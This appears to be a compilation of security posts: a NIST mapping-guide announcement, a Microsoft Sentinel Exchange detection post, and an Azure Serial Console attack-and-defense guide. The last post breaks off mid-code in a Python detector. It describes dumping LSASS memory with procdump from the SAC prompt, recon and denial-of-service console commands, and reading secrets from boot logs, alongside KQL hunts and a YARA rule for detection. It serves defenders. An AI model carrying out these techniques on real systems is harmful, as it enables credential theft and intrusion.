Cybersecurity and Privacy Mapping Guide: Draft NIST IR 8477 Available for Comment

NIST has released the initial public draft (ipd) of a new report for public comment: NIST Internal Report (IR) 8477 ipd, Mapping Relationships Between Documentary Standards, Regulations, Frameworks, and Guidelines: Developing Cybersecurity and Privacy Concept Mappings.

Understanding how the elements of diverse sources of cybersecurity and privacy content are related to each other is an ongoing challenge for people in nearly every organization. This document explains NIST’s proposed approach for identifying and documenting relationships between concepts such as controls, requirements, recommendations, outcomes, technologies, functions, processes, techniques, roles, and skills.

NIST intends for the approach to be used for mapping relationships involving NIST cybersecurity and privacy publications that will be submitted to NIST’s National Online Informative References (OLIR) Program for hosting in NIST’s online Cybersecurity and Privacy Reference Tool (CPRT). This will include mapping the equivalent of the NIST Cybersecurity Framework’s (CSF) 1.1 Informative References in support of CSF 2.0.

By following this approach, NIST and others in the cybersecurity and privacy standards community can jointly establish a single concept system over time that links cybersecurity and privacy concepts from many sources into a cohesive, consistent set of relationship mappings. The mappings can then be used by different audiences to better describe the interrelated aspects of the global cybersecurity and privacy corpus.

The public comment period for this draft is open through October 6, 2023. Download a copy of the draft and submit your comments to [email protected].


Microsoft Post: Help Protect your Exchange Environment With Microsoft Sentinel

We recently published two solutions in the Sentinel content hub catalog to assist you with better detecting threats and misconfigurations of your Exchange environment. One solution is focused on on-premises Exchange Server and the second is for Exchange Online. Both solutions can be used simultaneously when you have a hybrid Exchange environment.

Why now?

In the past years, we have seen an increase in attacks against messaging environments. Taking control of an Exchange Server or abusing someone’s mailbox can have catastrophic consequences for your organization. Analysis of previous Exchange security incidents highlighted detection gaps and common misconfigurations, both of which could easily have been avoided. In Exchange on-premises deployments it is common to see configurations that have grown organically through upgrades and a succession of administrators. Management and administrative practices may not have kept pace with threat actors and in some cases have not changed in decades. Many configuration components are simply overlooked, and logs are rarely collected and centralized, which slows or prevents investigations.

Introducing Microsoft Exchange Security solutions

The two solutions aim to close detection gaps and proactively identify misconfigurations before they become a security incident. They collect critical logs, detect misconfigurations and present the information in dynamic dashboards.

The Exchange Server solution looks at the following core components:

  • standard and custom RBAC delegation
  • remote domain configuration
  • local administrators permissions
  • high privileged groups members
  • POP/IMAP configuration
  • send and receive connector configuration

The Exchange Online solution looks at the following core components:

  • standard and custom RBAC delegation

Amongst the scenarios the solutions enable, you will find the following:

  • Alert you when an administrative cmdlet is executed against a VIP user’s mailbox to exfiltrate content or modify who can access it (you decide who the VIPs are).
  • Detect when a monitored server-oriented cmdlet and a monitored user-oriented cmdlet are launched by the same user on the same server within 10 minutes of each other.
  • Improve your Exchange security posture by exposing misconfigurations in your Exchange environments.
  • Detect the use of custom Exchange RBAC configuration that can put your environment at risk.
  • Report on admin activities to optimize your delegation model.
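As an added example (not code from the Microsoft Exchange Security solution), here are the VIP scenario and the server-plus-user correlation scenario implemented in Python over a few constructed admin-audit records. The cmdlet watchlists, the VIP list and the record layout are assumptions made for the example, not the solution’s own lists or schema:

```python
"""Added example (not part of the Microsoft Exchange Security solution): two of
the scenarios above, implemented over constructed Exchange admin-audit records
so the logic can be run offline.

  A. a monitored mailbox cmdlet executed against a VIP mailbox;
  B. a monitored server-oriented cmdlet and a monitored user-oriented cmdlet
     run by the same admin on the same server within 10 minutes (either order).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Watchlists are illustrative assumptions, not the solution's own lists.
USER_CMDLETS = {"Add-MailboxPermission", "New-InboxRule", "Set-Mailbox", "Search-Mailbox"}
SERVER_CMDLETS = {"New-ReceiveConnector", "Set-TransportConfig", "New-ManagementRoleAssignment"}
VIPS = {"ceo@contoso.example", "cfo@contoso.example"}   # you decide who the VIPs are
WINDOW = timedelta(minutes=10)


@dataclass(frozen=True)
class AuditRecord:
    when: datetime
    caller: str    # admin who ran the cmdlet
    server: str    # Exchange server that executed it
    cmdlet: str
    target: str    # object identity the cmdlet was run against


def vip_alerts(records):
    """Scenario A: any monitored user-oriented cmdlet whose target is a VIP mailbox."""
    return [r for r in records if r.cmdlet in USER_CMDLETS and r.target.lower() in VIPS]


def server_then_user_alerts(records):
    """Scenario B: pairs of (server-oriented, user-oriented) monitored cmdlets by the
    same caller on the same server no more than WINDOW apart. Records are sorted by
    time so the inner loop can stop at the first record outside the window."""
    monitored = sorted((r for r in records if r.cmdlet in USER_CMDLETS | SERVER_CMDLETS),
                       key=lambda r: r.when)
    pairs = []
    for i, a in enumerate(monitored):
        for b in monitored[i + 1:]:
            if b.when - a.when > WINDOW:
                break
            if a.caller != b.caller or a.server != b.server:
                continue
            # one of the two must be server-oriented and the other user-oriented
            if (a.cmdlet in SERVER_CMDLETS) != (b.cmdlet in SERVER_CMDLETS):
                pairs.append((a, b))
    return pairs


T0 = datetime(2023, 9, 1, 10, 0)
SAMPLE = [  # constructed records, not real audit data
    AuditRecord(T0, "admin1", "EXCH01", "New-ReceiveConnector", "Relay-Internal"),
    AuditRecord(T0 + timedelta(minutes=3), "admin1", "EXCH01", "Add-MailboxPermission", "CEO@contoso.example"),
    AuditRecord(T0 + timedelta(minutes=4), "admin2", "EXCH02", "Set-TransportConfig", "Transport"),
    AuditRecord(T0 + timedelta(minutes=5), "admin2", "EXCH01", "New-InboxRule", "alice@contoso.example"),
    AuditRecord(T0 + timedelta(minutes=25), "admin1", "EXCH01", "Set-Mailbox", "bob@contoso.example"),
]

if __name__ == "__main__":
    for r in vip_alerts(SAMPLE):
        print("VIP mailbox touched:", r)
    for a, b in server_then_user_alerts(SAMPLE):
        print("server+user cmdlets within 10 min:", a.cmdlet, "->", b.cmdlet, "by", a.caller, "on", a.server)
```

In the sample, admin2 runs a server cmdlet on EXCH02 and a user cmdlet on EXCH01 one minute apart; that pair is deliberately not flagged, because the scenario requires the same server as well as the same user.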

How does it work?

The base of the solution is a script that connects directly to Microsoft Sentinel and uploads the results of its security configuration checks (the script runs on-premises for the on-premises version, and in an Azure Automation runbook for the online version). It uses the Log Analytics ingestion API to send the data directly to your Sentinel workspace.

Note that the solution supports the collection of multiple Exchange organizations and multiple tenants within the same Sentinel workspace.

You can also configure the solution to upload additional data such as audit logs, security events of Exchange servers and/or domain controllers, and IIS log files, using either the Azure Monitor Agent (with Azure Arc for on-premises servers) or the legacy Microsoft Monitoring Agent.

You can then explore the data with carefully crafted workbooks to visualize your posture, and trigger incidents with analytics rules to alert you to important security events.

Your Exchange security posture, quickly visualized in a workbook.

A workbook helps you apply the least privilege principle to your delegation model.

A workbook monitors activities on mailboxes, and especially on designated VIP mailboxes.

Data ingestion

To keep the solution cost effective, you can select the level of data you wish to collect from your environment. The more data you collect, the more detection scenarios you can enable. To help you pick the right collection level, refer to this table:

Collection option | Data to upload | Volume | Valuable for workbooks | Valuable for hunting
0 | Configuration script results | Low | High | Low
1 | Exchange related event logs of Exchange servers | Medium | Medium | Medium
2 | Security/Application/System event logs of Exchange servers | Medium | Low to Medium | Medium
3 | Security logs of domain controllers located in the Exchange sites | Medium to High | Low to Medium | Medium
4 | Security logs of all domain controllers | High | Low to Medium | Medium to High
5 | IIS logs of Exchange servers | High | Low | High
6 | Message tracking of all Exchange servers | High | Low | Low to Medium
7 | HTTP proxy logs of all Exchange servers | High | High | High

Except for collection option 0, all options are independent of each other. They are deployed as Microsoft Sentinel data connectors using data collection rules (DCRs) with the Azure Monitor Agent, and you can activate or deactivate each option whenever you want.

Get started!

Connect to your Microsoft Sentinel workspace, click on the Content hub blade and search for Microsoft Exchange Security:


Review the details and click Install to get started!

Alternatively, you can navigate to the respective solution’s landing page in Azure.

Microsoft: Azure Serial Console Attack and Defense – Part 1

Ever had a virtual machine crash? Azure Serial Console is a great way to connect directly to your virtual machine and debug what went wrong. It is available free of charge to everyone. While the primary intent of the feature is to help users debug their machines, there are several interesting ways to abuse it and compromise sensitive information. Let’s dive into the feature, explore the ways its capabilities can be exploited, and look at how to detect exploitation activity.

Contents 

  • What’s Azure Serial Console?
  • Why Azure Serial Console can be a good target for an adversary?
  • Enable logging for user operation tracking
  • Different techniques to exploit features of Azure Serial Console
  • Hunting for suspicious operations
  • Best practices
  • Conclusion

What’s Azure Serial Console? 

Azure Serial Console connects to the “ttyS0” or “COM1” serial port of a Virtual Machine (VM) or Virtual Machine Scale Set (VMSS) instance and provides access independent of network or operating-system state. It is a text-based console for VMs and VMSS on Azure that is generally available in all Azure public regions (except Azure China Cloud) and in public preview in Azure Government.

Pre-conditions to access Azure Serial Console: 

  • Boot diagnostics must be enabled for the VM (this can be enabled while creating the VM).
  • An identity with at least the Virtual Machine Contributor role.
  • The adversary is able to reach https://portal.azure.com (or the Azure CLI).
  • Credentials for the VM/VMSS guest OS (not required for some of the attack scenarios below).

Why Azure Serial Console can be a good target for an adversary? 

Azure Serial Console can be leveraged to circumvent network-level security controls, and that is precisely why it is an attractive target for adversaries.

  • Imagine a scenario where your virtual machine is locked down: RDP/SSH or other access has been disabled or restricted. This is typically the case for many production-grade setups where access is restricted to specific IPs or subnets. Azure Serial Console is not bound by NSG restrictions and can give an attacker CLI access to the machine.
  • Microsoft Defender for Cloud offers Just in time access (JIT), a great feature that allows admins to enable access only when access is needed, on the ports needed, and for the period of time needed. For VMs where JIT is enabled, Azure Serial Console can still be used to connect to VMs without having to request access through JIT.

Enable logging for user operation tracking 

There are several ways to stream and analyze logs, but for the sake of this blog we will create a Log Analytics workspace and stream logs to it. This lets us analyze the activity without owning a logging solution. Your setup may differ: if you have a SIEM, the schema and query language might be different.

Creation of Log Analytics Workspace 

Step-1: Go to Create Log Analytics Workspace in the Azure portal and select the appropriate subscription, resource group and name. Please note that Azure Monitor comes in two SKUs; for pricing details on Azure Log Analytics, please check here.


Enabling Azure Activity Log monitoring 

Step-1: Go to Activity Log, and click on “Export Activity Logs”.


Step-2: Click on “Add diagnostic setting” and select the “Administrative” and “Security” categories. Click on “Send to Log Analytics Workspace” and select the Log Analytics workspace created in the previous step.


Enabling Windows Event Log monitoring 

Please note that this might not be required depending on your current setup. Feel free to skip this step if your cloud compute workloads are already being monitored either with Microsoft Sentinel or another Security monitoring solution (such as SIEM).

Step-1: Install Sysmon using the guide here.

Step-2: Download the Azure Monitor Agent and configure it. Go to Agents, download the Windows agent (64-bit or 32-bit), follow the on-screen instructions and install the agent. Once the installation is complete, proceed to the next step.

Step-3: Create a data collection rule. Go to the creation wizard and fill in the name, resource group and location. Follow the instructions in the video below to complete the log configuration. Use the following XPath to collect the Sysmon operational log:

<QueryList>
    <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
        <Select Path="Microsoft-Windows-Sysmon/Operational">*</Select>
    </Query>
</QueryList>

Step-4: Verify that the Azure Activity logs and Windows event logs are being received by using the following KQL queries. Go to the VM that you created for testing and open the Logs section in the left-hand navigation bar.

  • Check Azure Activity logs

AzureActivity
| summarize count() by OperationNameValue
| count

  • Check Windows event logs

Event
| count

If the output is greater than 0, logging is configured successfully.

Different techniques to exploit features of Azure Serial Console 

Please note that the following are limited to possibilities on a Windows Operating System.

Execution of Command: 

Azure Serial Console’s primary feature is the execution of commands. Provided that the attacker has credentials to the VM, they can execute commands with root/admin privileges on it. This does not provide GUI access, but CLI access is enough to execute commands, maintain persistence and move laterally across the network. To execute commands on a VM using Azure Serial Console, follow these steps.

  1. Go to the Serial Console option in the left navigation bar and, once the SAC prompt loads, enter cmd to create a command prompt channel.
  2. Enter ch -sn Cmd0001 to switch to the channel’s context, press ENTER and then enter the credentials to log in to the CLI of the VM.

The same can be done using the Azure CLI: az serial-console connect -n <VM_Name> -g <ResourceGroup_Name> connects to the VM’s serial console.

Tracing of User activity performed using Azure Serial Console: 

Assuming that you have followed all the steps (installing Sysmon, configuring Windows event logging), the following KQL query can be used to trace activities performed using Azure Serial Console. The logic is to gather all logon IDs from Windows event ID 4624 where the logon process is sacsess.exe (the Special Administration Console session process), and then identify Sysmon process-creation events whose LogonId belongs to that list.

let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)

Using Azure Activity logs, we can trace the connection attempts performed by an adversary:

AzureActivity
| where OperationNameValue =~ "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
| where ActivityStatusValue =~ "Success"

Dumping of a specific process 

One of the most interesting attack vectors that Azure Serial Console enables is dumping a process without authenticating to the guest OS: the SAC commands are available before you log in to a command prompt channel. The following steps achieve this.

  1. Use the t command to list all processes and identify the PID of the process you want to dump.
  2. Use the command procdump <PID> <LOCATION_OF_THE_FILE> with that PID. In the following example, we dump the process memory of LSASS.exe.

Tracing of dumping activity performed using Azure Serial Console: 

For process dumps created this way, the following query can be used.

Event
| where EventID == 11
| where RenderedDescription has "lsass.dmp"

The query searches for the creation of the file lsass.dmp in the event logs related to File creation (Event ID: 11 generated by Sysmon).


Further analysis indicated that the dump file is created by svchost.exe (command line of the creating process: C:\Windows\system32\svchost.exe -k netsvcs -p), whose parent process is services.exe and grandparent process is wininit.exe. This is interesting because nothing in the process tree indicates that the activity was performed through the serial console.


This activity is currently detected by Microsoft Defender for Endpoint. Further guidance on how to detect and prevent LSASS dumping is documented here.

The process tree evidence as seen in Defender for Endpoint is below:


An LSASS minidump written this way can be identified with the following YARA rule (the MDMP magic at offset 0 plus strings characteristic of LSASS memory):

rule creation_of_dmp {
    meta:
        author = "Subhash P <@pbssubhash>"
        filetype = "DUMP File"
        date = "1/1/2023"
        version = "1.0"
    strings:
        $md = { 4d 44 4d 50 }
        $a1 = "SeDebugPrivilege" fullword wide 
        $a2 = "\\pipe\\lsass" fullword wide
        $a3 = "lsasspirpc" fullword wide
    condition:
        ($md at 0) and all of ($a*)
}

Enumeration and other capabilities 

Azure Serial Console offers a few other capabilities in the unauthenticated SAC console mode. The following is the full list of commands (other than procdump) that are available in SAC:

Command | Short description | Security implication
ch | Channel management commands | None
cmd | Create a command prompt channel | Execute commands on the VM
d | Dump the current kernel log | Aids an adversary in performing recon
f | Toggle detailed or abbreviated tlist info | Aids an adversary in performing recon
i | List all IP network numbers and their IP addresses, and set IP info | Aids an adversary in performing recon
id | Display the computer identification information | Aids an adversary in performing recon
k <pid> | Kill the given process | Denial of service
l <pid> | Lower the priority of a process to the lowest possible | Degrade performance of a service
lock | Lock access to command prompt channels | Denial of service
m <pid> <MB-allow> | Limit the memory usage of a process to <MB-allow> MB | Degrade performance of a service
p | Toggle paging the display | None
r <pid> | Raise the priority of a process by one | None
s | Display the current time and date (24-hour clock) | None
s mm/dd/yyyy hh:mm | Set the current time and date (24-hour clock) | Denial of service
t | Display the task list | Aids an adversary in performing recon
restart | Restart the system immediately | Denial of service
shutdown | Shut down the system immediately | Denial of service
crashdump | Crash the system (crash dump must be enabled) | Denial of service
livedump [-u] [-h] | Create a live kernel dump; the optional arguments include userspace (-u) and hypervisor (-h) memory in the dump | Exfiltrate secrets from the dump

Tracing of the activity performed by an adversary: 

The actions performed by an adversary using Azure Serial Console (inside a command prompt channel and at the SAC prompt itself) can be traced using the Boot diagnostics logs. They can be viewed in the Help section of the VM’s left navigation bar, but they cannot be exported or streamed to an external location.


The log itself lets an attacker harvest credentials and other secrets passed as command line parameters, for example net user <username> <password> /add. Because every command typed into Azure Serial Console is recorded here, any secret an admin puts on a command line can be read back by an adversary with access to the boot diagnostics. To identify whether someone has retrieved the boot diagnostics data, the following query can be used:

AzureActivity
| where OperationNameValue == "MICROSOFT.COMPUTE/VIRTUALMACHINES/RETRIEVEBOOTDIAGNOSTICSDATA/ACTION"
| where ActivityStatusValue == "Success"

Hunting for suspicious operations 

Suspicious Azure Serial Console Interactions in Azure Activity logs: 

  • Unusual IP or user interaction: The following query identifies any Azure Serial Console connection made by an identity, or from an IP address, that was not seen in the preceding 30 days. The baseline deliberately stops where the one-day detection window begins; if the baseline included the last day, every connection would be its own precedent and nothing would ever be flagged. While this is a very naive way of filtering, advanced techniques such as UEBA are available with Microsoft Sentinel.

let Baseline = AzureActivity
| where TimeGenerated between (ago(30d) .. ago(1d))
| distinct Caller, CallerIpAddress;
let Callers = Baseline | distinct Caller;
let IPs = Baseline | distinct CallerIpAddress;
AzureActivity
| where TimeGenerated >= ago(1d)
| where OperationNameValue =~ "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
| where not(Caller in (Callers) and CallerIpAddress in (IPs))

  • Failed access attempts: The following query identifies failed attempts to access Azure Serial Console. This may be an adversary performing recon to find out whether they have access to the console.

AzureActivity
| where TimeGenerated >= ago(7d)
| where OperationNameValue =~ "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
| where ActivityStatusValue != "Success"

  • Risky sign-in with subsequent serial console action: The following query identifies risky users accessing Azure Serial Console. Please note that the identity protection risk events have to be streamed to the workspace by following this guide. The query gets the list of risky users and checks whether the same IP that triggered Microsoft identity protection risk detections was used to access the serial console.

let RiskyUsersData = AADUserRiskEvents
| summarize by UserPrincipalName, IpAddress;
let RiskyCallers = RiskyUsersData | distinct UserPrincipalName;
let RiskyIPs = RiskyUsersData | distinct IpAddress;
AzureActivity
| where OperationNameValue == "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
| where Caller has_any (RiskyCallers) and CallerIpAddress has_any (RiskyIPs)
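As an added example (not one of the post’s queries), the “unusual IP or user” hunt implemented in Python over constructed AzureActivity-style records. It is here to make the baseline edge case concrete: the same function is run once with the baseline ending where the detection window starts, and once with the two overlapping, which is the version that never fires. The record layout and the sample data are assumptions made for the example:

```python
"""Added example (not the post's own query): the "unusual IP or user" hunt
above, implemented over constructed AzureActivity-style records. It shows why
the 30-day baseline must end where the 1-day detection window begins: if the
two overlap, every event in the window is its own precedent and nothing is
flagged."""
from dataclasses import dataclass
from datetime import datetime, timedelta

SERIAL_CONNECT = "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
VM_START = "MICROSOFT.COMPUTE/VIRTUALMACHINES/START/ACTION"


@dataclass(frozen=True)
class Activity:          # the AzureActivity columns the hunt uses
    time: datetime       # TimeGenerated
    caller: str          # Caller
    ip: str              # CallerIpAddress
    operation: str       # OperationNameValue


def unusual_serial_console_access(activity, now, baseline_days=30, detect_days=1,
                                  exclude_detect_window=True):
    """Serial-console connects in the detection window by a caller or source IP
    that the baseline has never seen. exclude_detect_window=False reproduces the
    overlapping-baseline mistake for comparison."""
    baseline_start = now - timedelta(days=baseline_days)
    detect_start = now - timedelta(days=detect_days)
    baseline_end = detect_start if exclude_detect_window else now
    baseline = [a for a in activity if baseline_start <= a.time < baseline_end]
    known_callers = {a.caller for a in baseline}
    known_ips = {a.ip for a in baseline}
    return [a for a in activity
            if detect_start <= a.time <= now
            and a.operation == SERIAL_CONNECT
            and not (a.caller in known_callers and a.ip in known_ips)]


NOW = datetime(2023, 9, 10, 12, 0)


def _ago(days=0, hours=0):
    return NOW - timedelta(days=days, hours=hours)


SAMPLE = [  # constructed records, not real activity log data
    Activity(_ago(days=20), "admin@contoso.example", "198.51.100.10", SERIAL_CONNECT),
    Activity(_ago(days=9), "admin@contoso.example", "198.51.100.10", VM_START),
    Activity(_ago(days=3), "ops@contoso.example", "198.51.100.11", SERIAL_CONNECT),
    # --- last 24 hours: the detection window ---
    Activity(_ago(hours=6), "admin@contoso.example", "198.51.100.10", SERIAL_CONNECT),       # known caller and IP
    Activity(_ago(hours=5), "admin@contoso.example", "203.0.113.44", SERIAL_CONNECT),        # known caller, new IP
    Activity(_ago(hours=4), "contractor@contoso.example", "198.51.100.11", SERIAL_CONNECT),  # new caller, known IP
    Activity(_ago(hours=3), "admin@contoso.example", "203.0.113.45", VM_START),              # new IP, but not serial console
]

if __name__ == "__main__":
    for hit in unusual_serial_console_access(SAMPLE, NOW):
        print("unusual serial console access:", hit.caller, hit.ip, hit.time)
    print("with overlapping baseline:",
          unusual_serial_console_access(SAMPLE, NOW, exclude_detect_window=False))
```

Only the new-IP and new-caller connections are returned; the VM start from a new IP is ignored because the hunt is scoped to serial console connects, and the overlapping-baseline run returns nothing at all.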

Suspicious operations in Windows Event logs: 

  • LOLBIN execution through Azure Serial Console: The following query pulls the list of LOLBINs from the LOLBAS project API and, with a bit of pre-processing, identifies processes created in Azure Serial Console sessions and checks whether any of those binaries are among them.

let LolBins = externaldata(Name:string, Description:string, Author:string, Created:datetime, Commands:dynamic, FullPath:dynamic, Detection:dynamic)
    ["https://lolbas-project.github.io/api/lolbas.json"] with(format="multijson");
let ExecLols = LolBins
| mv-expand Commands
| extend Category = Commands['Category']
| distinct Name;
let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""),
         ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""),
         ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""),
         CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","")
| extend ProcessName = split(ProcessName, @"\")[-1]
| where ProcessName has_any (ExecLols)

  • PowerShell execution through Azure Serial Console: The following query identifies processes that were created in Azure Serial Console sessions and have the keyword powershell in their command line.

let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""),
         ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""),
         ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""),
         CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","")
| where CommandLine has "powershell"

  • Network connections from processes started through Azure Serial Console: The following query identifies processes that were created in Azure Serial Console sessions and checks for Sysmon Event ID 3 events (generated when a process initiates a network connection) from those process IDs.

let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
let ProcID = Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>","")
| distinct ProcessId;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 3
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>","")
| where ProcessId has_any (ProcID)
  • Creation of services using Azure Serial Console (via command line parameters): The following query detects the use of sc.exe to create services from a serial console session. It matches on the image name and the create verb rather than on the bare term “sc”, which would also match unrelated command lines.

let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""),
         ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""),
         ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""),
         CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","")
| where ProcessName endswith @"\sc.exe" and CommandLine has "create"
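As an added example (not the post’s code), the session-tracing chain from the “Tracing of User activity” section and the four hunting pivots above (PowerShell, service creation, LOLBINs, network connections) implemented in Python over constructed Security and Sysmon event records, so the logic can be checked offline without a workspace. The LOLBIN list is a hand-picked subset standing in for the LOLBAS feed, the EventData layout is the stock <Data Name="..."> form, and the sc.exe check requires the image sc.exe plus the create verb; the record layout and sample events are assumptions made for the example:

```python
"""Added example (not the post's own code): the serial-console session-tracing
logic from the KQL above plus the hunting pivots, run over constructed Windows
event records.

Chain: Security 4624 whose logon process is sacsess.exe -> TargetLogonId
       -> Sysmon EID 1 with the same LogonId (processes spawned in the SAC session)
       -> Sysmon EID 3 whose ProcessId is one of those processes.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

SECURITY = "Microsoft-Windows-Security-Auditing"
SYSMON = "Microsoft-Windows-Sysmon"
# Constructed subset standing in for the LOLBAS feed the KQL downloads.
LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class Event:
    source: str
    event_id: int
    event_data: str  # the <EventData> XML as stored in the Event table


def fields(ev):
    """Parse <Data Name="X">value</Data> elements into a dict (no regex needed)."""
    return {d.get("Name"): (d.text or "") for d in ET.fromstring(ev.event_data).iter("Data")}


def sac_logon_ids(events):
    """Logon IDs created by sacsess.exe, i.e. interactive logons via Serial Console."""
    ids = set()
    for ev in events:
        if ev.source == SECURITY and ev.event_id == 4624:
            f = fields(ev)
            if f.get("ProcessName", "").lower().endswith("\\sacsess.exe"):
                ids.add(f["TargetLogonId"].lower())
    return ids


def sac_processes(events):
    """Sysmon process-creation events whose LogonId belongs to a SAC session."""
    ids = sac_logon_ids(events)
    procs = []
    for ev in events:
        if ev.source == SYSMON and ev.event_id == 1:
            f = fields(ev)
            if f.get("LogonId", "").lower() in ids:
                procs.append(f)
    return procs


def hunt(events):
    """Apply the hunting pivots to SAC-spawned processes; returns (kind, pid, detail)."""
    procs = sac_processes(events)
    sac_pids = {p["ProcessId"] for p in procs}
    findings = []
    for p in procs:
        image = p["Image"].rsplit("\\", 1)[-1].lower()
        cmd = p.get("CommandLine", "").lower()
        if "powershell" in cmd:
            findings.append(("powershell", p["ProcessId"], cmd))
        if image == "sc.exe" and " create " in cmd:   # tighter than `has "sc"`
            findings.append(("service-create", p["ProcessId"], cmd))
        if image in LOLBINS:
            findings.append(("lolbin", p["ProcessId"], image))
    for ev in events:                                  # EID 3 pivot on ProcessId
        if ev.source == SYSMON and ev.event_id == 3:
            f = fields(ev)
            if f.get("ProcessId") in sac_pids:
                findings.append(("network", f["ProcessId"], f.get("DestinationIp", "")))
    return findings


def _ed(**kv):
    """Build an <EventData> blob for the constructed sample below."""
    return "<EventData>" + "".join(f'<Data Name="{k}">{v}</Data>' for k, v in kv.items()) + "</EventData>"


SAC_LOGON, RDP_LOGON = "0x4A1B2", "0x9F00C"
SAMPLE = [  # constructed records, not real telemetry
    Event(SECURITY, 4624, _ed(TargetUserName="azureadmin", TargetLogonId=SAC_LOGON, LogonType="2",
                              ProcessName=r"C:\Windows\System32\sacsess.exe")),
    Event(SECURITY, 4624, _ed(TargetUserName="azureadmin", TargetLogonId=RDP_LOGON, LogonType="10",
                              ProcessName=r"C:\Windows\System32\winlogon.exe")),
    Event(SYSMON, 1, _ed(ProcessId="4120", Image=r"C:\Windows\System32\cmd.exe", CommandLine="cmd.exe",
                         ParentImage=r"C:\Windows\System32\sacsess.exe", LogonId=SAC_LOGON)),
    Event(SYSMON, 1, _ed(ProcessId="4388", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                         CommandLine="powershell -nop -enc SQBFAFgA",
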